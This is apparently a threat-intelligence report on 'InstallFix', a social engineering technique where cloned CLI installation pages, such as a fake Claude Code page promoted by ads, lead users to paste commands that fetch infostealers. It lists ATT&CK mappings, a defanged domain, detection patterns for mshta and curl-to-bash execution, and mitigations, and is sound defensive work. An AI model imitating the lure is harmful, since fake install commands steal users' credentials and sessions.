Full Report
Threat actors are employing a new variation of the ClickFix social engineering technique called InstallFix to convince users into running malicious commands under the pretext of installing legitimate command line interface (CLI) tools. [...]
Analysis Summary
# Tool/Technique: InstallFix
## Overview
InstallFix is a social engineering technique and a variation of the "ClickFix" methodology. It targets developers and non-technical users by providing fake installation guides for legitimate Command Line Interface (CLI) tools (e.g., Anthropic’s Claude Code). The technique exploits the "curl-to-bash" or "copy-paste to terminal" habit, tricking users into executing malicious encoded commands that download and run infostealers.
## Technical Details
- **Type:** Social Engineering Technique / Malware Delivery Vector
- **Platform:** Windows (PowerShell/CMD), macOS (Terminal)
- **Capabilities:** Credential theft, session hijacking, system reconnaissance.
- **First Seen:** March 2026 (Reported by Push Security)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566.002 - Phishing: Spearphishing Link] (Malvertising/Fake Docs)
- **[TA0002 - Execution]**
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- [T1059.003 - Command and Scripting Interpreter: Windows Command Shell]
- [T1204.002 - User Execution: Malicious File]
- **[TA0005 - Defense Evasion]**
- [T1218.005 - System Binary Proxy Execution: Mshta.exe]
- [T1027 - Obfuscated Files or Information]
## Functionality
### Core Capabilities
- **Deceptive Impersonation:** Clones legitimate documentation pages (e.g., Claude Code) including branding, sidebars, and links to appear authentic.
- **Payload Delivery:** Provides pre-crafted commands for terminal execution that utilize `mshta.exe` or `curl` to fetch remote binaries.
- **Malvertising Integration:** Leverages Google Ads to rank malicious documentation pages at the top of search results for CLI-related queries.
### Advanced Features
- **Legitimate Hosting:** Uses reputable platforms like Squarespace, Cloudflare Pages, and Tencent EdgeOne to bypass domain reputation filters.
- **Seamless Redirection:** Redirects all non-malicious links on the fake page to the actual legitimate site to minimize suspicion after the initial infection.
## Indicators of Compromise
- **File Names:** `mshta.exe`, `conhost.exe` (as parent/child processes of terminal applications).
- **Network Indicators:**
- `claude-code-cmd.squarespace[.]com`
- (Additional generic indicators involve Cloudflare Pages and Tencent EdgeOne subdomains).
- **Behavioral Indicators:**
- Unexpected `mshta.exe` execution triggered by `powershell.exe` or `cmd.exe`.
- Terminal commands containing base64 encoded strings or direct calls to unknown remote endpoints.
## Associated Threat Actors
- Unknown (Service-based attackers using **Amatera** / ACR Stealer).
## Detection Methods
- **Behavioral Detection:** Monitor for instances where `cmd.exe` or `powershell.exe` spawns `mshta.exe`. Detect "curl-to-bash" patterns connecting to non-standard or newly observed domains.
- **EDR Pattern Matching:** Alert on user-initiated CLI commands that download and execute content from third-party hosting platforms (Squarespace, etc.).
- **Network Monitoring:** Inspect traffic for connections to known malicious Squarespace or Cloudflare Pages addresses associated with "ClickFix" campaigns.
## Mitigation Strategies
- **Prevention Measures:** Train staff to avoid copying commands directly from third-party sites. Enforce the use of official package managers (npm, brew, pip) only from verified sources.
- **Hardening:** Block or restrict `mshta.exe` and `conhost.exe` execution if not required for business operations.
- **Browser Protection:** Use browser security tools that can identify cloned sites or "scatternet" infrastructure used in ClickFix attacks.
## Related Tools/Techniques
- **ClickFix:** The parent social engineering technique involving fake "Fix It" buttons in browsers.
- **Amatera:** The specific infostealer (based on ACR Stealer) frequently delivered via this method.
- **ClearFake:** A similar social engineering framework for delivering malware via fake updates.